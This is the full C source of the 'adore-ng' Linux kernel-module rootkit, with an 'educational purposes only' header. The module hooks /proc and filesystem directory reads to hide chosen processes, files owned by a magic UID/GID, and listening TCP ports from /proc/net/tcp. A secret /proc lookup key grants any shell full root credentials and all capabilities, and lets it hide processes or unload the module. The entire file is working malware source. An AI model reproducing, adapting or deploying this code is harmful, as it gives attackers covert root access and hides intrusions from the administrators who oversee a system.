/*** (C) 2003 by Stealth
 ***
 *** http://spider.scorpions.net/~stealth
 *** http://stealth.7350.org/
 ***	
 ***
 *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
 *** SO YOU USE THIS AT YOUR OWN RISK!
 *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS. 
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 ***	-> Use ava to get all the things workin'.
 ***
 *** Greets fly out to all my friends. You know who you are. :)
 *** Special thanks to Shivan for granting root access to his
 *** SMP box for adore-development. More thx to skyper for also
 *** granting root access. Thanks to palmers for his p58 article.
 ***
 ***/
#define __KERNEL__
#define MODULE

#define LINUX26

#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/mount.h>
#include <linux/proc_fs.h>
#include <linux/capability.h>
#include <linux/pid.h>
#include <linux/init.h>


#include "adore-ng.h"


char *proc_fs = "/proc";	/* default proc FS to hide processes */
MODULE_PARM(proc_fs, "s");
char *root_fs = "/";		/* default FS to hide files */

MODULE_PARM(root_fs, "s");
char *opt_fs = NULL;
MODULE_PARM(opt_fs, "s");


typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_root_readdir=NULL,orig_opt_readdir=NULL,orig_proc_readdir=NULL;

struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *,
                                   struct nameidata *) = NULL;


static void adore_cleanup();

static int tcp_new_size();
static int (*o_get_info_tcp)(char *, char **, off_t, int);


#ifndef PID_MAX
#define PID_MAX 0x8000
#endif

static char hidden_procs[PID_MAX/8+1];

inline void hide_proc(pid_t x)
{
	if (x >= PID_MAX || x == 1)
		return;
	hidden_procs[x/8] |= 1<<(x%8);
}

inline void unhide_proc(pid_t x)
{
	if (x >= PID_MAX)
		return;
	hidden_procs[x/8] &= ~(1<<(x%8));
}

inline char is_invisible(pid_t x)
{
	if (x >= PID_MAX)
		return 0;
	return hidden_procs[x/8]&(1<<(x%8));
}

/* Theres some crap after the PID-filename on proc
 * getdents() so the semantics of this function changed:
 * Make "672" -> 672 and
 * "672|@\"   -> 672 too
 */
int adore_atoi(const char *str)
{
	int ret = 0, mul = 1;
	const char *ptr;
   
	for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) 
		;
	ptr--;
        while (ptr >= str) {
		if (*ptr < '0' || *ptr > '9')
            		break;
		ret += (*ptr - '0') * mul;
		mul *= 10;
		ptr--;
	}
	return ret;
}

/* Own implementation of find_task_by_pid() */
struct task_struct *adore_find_task(pid_t pid)
{
	struct task_struct *p;

	read_lock(&tasklist_lock);	
	for_each_task(p) {
		if (p->pid == pid) {
			read_unlock(&tasklist_lock);
			return p;
		}
	}
	read_unlock(&tasklist_lock);
	return NULL;
}

int should_be_hidden(pid_t pid)
{
	struct task_struct *p = NULL;

	if (is_invisible(pid)) {
		return 1;
	}

	p = adore_find_task(pid);
	if (!p)
		return 0;

	/* If the parent is hidden, we are hidden too XXX */
	task_lock(p);

	if (is_invisible(p->parent->pid)) {
		task_unlock(p);
		hide_proc(pid);
		return 1;
	}

	task_unlock(p);
	return 0;
}

/* You can control adore-ng without ava too:
 *
 * echo > /proc/<ADORE_KEY> will make the shell authenticated,
 * echo > /proc/<ADORE_KEY>-fullprivs will give UID 0,
 * cat /proc/hide-<PID> from such a shell will hide PID,
 * cat /proc/unhide-<PID> will unhide the process
 */
struct dentry *adore_lookup(struct inode *i, struct dentry *d,
                            struct nameidata *nd)
{
	task_lock(current);

	if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
		current->flags |= PF_AUTH;
		current->suid = ADORE_VERSION;
	} else if ((current->flags & PF_AUTH) &&
		   strncmp(d->d_iname, "fullprivs", 9) == 0) {
		current->uid = 0;
		current->suid = 0;
		current->euid = 0;
	    	current->gid = 0;
		current->egid = 0;
	    	current->fsuid = 0;
		current->fsgid = 0;

		cap_set_full(current->cap_effective);
		cap_set_full(current->cap_inheritable);
		cap_set_full(current->cap_permitted);
	} else if ((current->flags & PF_AUTH) &&
	           strncmp(d->d_iname, "hide-", 5) == 0) {
		hide_proc(adore_atoi(d->d_iname+5));
	} else if ((current->flags & PF_AUTH) &&
	           strncmp(d->d_iname, "unhide-", 7) == 0) {
		unhide_proc(adore_atoi(d->d_iname+7));
	} else if ((current->flags & PF_AUTH) &&
		   strncmp(d->d_iname, "uninstall", 9) == 0) {
			cleanup_module();
	}

	task_unlock(current);

	if (should_be_hidden(adore_atoi(d->d_iname)) &&
	/* A hidden ps must be able to see itself! */
	    !should_be_hidden(current->pid))
		return NULL;

	return orig_proc_lookup(i, d);
}


filldir_t proc_filldir = NULL;
rwlock_t proc_filldir_lock = RW_LOCK_UNLOCKED;

int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	if (should_be_hidden(adore_atoi(name)))
		return 0;
	return proc_filldir(buf, name, nlen, off, ino, x);
}



int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;

	write_lock(&proc_filldir_lock);//XXX locking correct?
	proc_filldir = filldir;
	r = orig_proc_readdir(fp, buf, adore_proc_filldir);
	write_unlock(&proc_filldir_lock);
	return r;
}


filldir_t opt_filldir = NULL;
rwlock_t opt_filldir_lock = RW_LOCK_UNLOCKED;
struct super_block *opt_sb = NULL;


int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	struct inode *inode = NULL;
	int r = 0;

	if ((inode = iget(opt_sb, ino)) == NULL)
		return 0;

	/* Is it hidden ? */
	if (inode->i_uid == ELITE_UID && inode->i_gid == ELITE_GID) {
		r = 0;
	} else
		r = opt_filldir(buf, name, nlen, off, ino, x);

	iput(inode);

	return r;
}


int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;

	if (!fp || !fp->f_vfsmnt)
		return 0;

	write_lock(&opt_filldir_lock);//XXX locking correct?
	opt_filldir = filldir;
	opt_sb = fp->f_vfsmnt->mnt_sb; // XXX: if (opt_sb == NULL) ?
	r = orig_opt_readdir(fp, buf, adore_opt_filldir);
	write_unlock(&opt_filldir_lock);
	
	return r;
}



filldir_t root_filldir = NULL;
rwlock_t root_filldir_lock = RW_LOCK_UNLOCKED;
struct super_block *root_sb = NULL;


int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
	struct inode *inode = NULL;
	int r = 0;

	if ((inode = iget(root_sb, ino)) == NULL)
		return 0;

	/* Is it hidden ? */
	if (inode->i_uid == ELITE_UID && inode->i_gid == ELITE_GID) {
		r = 0;
	} else
		r = root_filldir(buf, name, nlen, off, ino, x);

	iput(inode);

	return r;
}


int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
{
	int r = 0;

	if (!fp || !fp->f_vfsmnt)
		return 0;

	write_lock(&root_filldir_lock);//XXX locking correct?
	root_filldir = filldir;
	root_sb = fp->f_vfsmnt->mnt_sb;
	r = orig_root_readdir(fp, buf, adore_root_filldir);
	write_unlock(&root_filldir_lock);
	
	return r;
}


int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
	struct file *filep;
	
        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
                return -1;
	}

	if (orig_readdir)
		*orig_readdir = filep->f_op->readdir;

	filep->f_op->readdir = new_readdir;
	filp_close(filep, 0);
	return 0;
}


int unpatch_vfs(const char *p, readdir_t orig_readdir)
{
	struct file *filep;
	
        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
                return -1;
	}

	filep->f_op->readdir = orig_readdir;
	filp_close(filep, 0);
	return 0;
}


char *strnstr(const char *haystack, const char *needle, size_t n)
{
	char *s = strstr(haystack, needle);
	if (s == NULL)
		return NULL;
	if (s-haystack+strlen(needle) <= n)
		return s;
	else
		return NULL;
}


struct proc_dir_entry *proc_find_tcp()
{
	struct proc_dir_entry *p = proc_net->subdir;

	while (strcmp(p->name, "tcp"))
		p = p->next;
	return p;
}


/* Reading from /proc/net/tcp gives back data in chunks
 * of NET_CHUNK. We try to match these against hidden ports
 * and remove them respectively
 */
#define NET_CHUNK 150
int n_get_info_tcp(char *page, char **start, off_t pos, int count)
{
	int r = 0, i = 0, n = 0, hidden = 0;
	char port[10], *ptr, *mem, *it;

	/* Admin accessing beyond sizeof patched file? */
	if (pos >= tcp_new_size())
		return 0;
	
	r = o_get_info_tcp(page, start, pos, count);

	if (r <= 0)// NET_CHUNK)
		return r;

	mem = (char *)kmalloc(r+NET_CHUNK+1, GFP_KERNEL);
	memset(mem, 0, r+NET_CHUNK+1);
	it = mem;

	/* If pos < NET_CHUNK then theres preamble which we can skip */
	if (pos >= NET_CHUNK) {
		ptr = page;
		n = (pos/NET_CHUNK) - 1;
	} else {
		memcpy(it, page, NET_CHUNK);
		it += NET_CHUNK;
		ptr = page + NET_CHUNK;
		n = 0;
	}

	for (; ptr < page+r; ptr += NET_CHUNK) {
		hidden = 0;
		for (i = 0; HIDDEN_SERVICES[i]; ++i) {
			sprintf(port, ":%04X", HIDDEN_SERVICES[i]);

			/* Ignore hidden blocks */
			if (strnstr(ptr, port, NET_CHUNK))
				hidden = 1;
		}
		if (!hidden) {
			sprintf(port, "%4d:", n);
			strncpy(ptr, port, strlen(port));
			memcpy(it, ptr, NET_CHUNK);
			it += NET_CHUNK;
			++n;
		}
	}

	memcpy(page, mem, r);
	n = strlen(mem);
	/* If we shrinked buffer, patch length */
	if (r > n)
		r = n-(*start-page);
	if (r < 0)
		r = 0;

	*start = page + (*start-page);

	kfree(mem);
	return r;
}


/* Calculate size of patched /proc/net/tcp */
int tcp_new_size()
{
	int r, l = 0, hits = 0, i = 0;
	char page[NET_CHUNK*10+1], *start, *ptr, port[10];

	for (;;) {

		memset(page, 0, sizeof(page));
		r = o_get_info_tcp(page, &start, l, sizeof(page)-1);

		if (r <= 0)
			break;
		l += r;
		for (ptr = start; ptr < start+r; ptr += NET_CHUNK) {
			for (i = 0; HIDDEN_SERVICES[i]; ++i) {
				sprintf(port, ":%04X", HIDDEN_SERVICES[i]);
				if (strnstr(ptr, port, NET_CHUNK)) {
					++hits;
					break;
				}
			}
		}
	}
	return l - hits*NET_CHUNK;
}

static int __init adore_init()
{
	struct proc_dir_entry *pde = NULL;

	memset(hidden_procs, 0, sizeof(hidden_procs));

	pde = proc_find_tcp();
	o_get_info_tcp = pde->get_info;
	pde->get_info = n_get_info_tcp;

	orig_proc_lookup = proc_root.proc_iops->lookup;
	proc_root.proc_iops->lookup = adore_lookup;

	patch_vfs(proc_fs, &orig_proc_readdir, adore_proc_readdir);
	patch_vfs(root_fs, &orig_root_readdir, adore_root_readdir);
	if (opt_fs)
		patch_vfs(opt_fs, &orig_opt_readdir,
		          adore_opt_readdir);
	return 0;
}


static void __exit adore_cleanup()
{
	proc_find_tcp()->get_info = o_get_info_tcp;
	proc_root.proc_iops->lookup = orig_proc_lookup;

	unpatch_vfs(proc_fs, orig_proc_readdir);
	unpatch_vfs(root_fs, orig_root_readdir);

	if (orig_opt_readdir)
		unpatch_vfs(opt_fs, orig_opt_readdir);

}

module_init(adore_init);
module_exit(adore_cleanup);

MODULE_LICENSE("GPL");

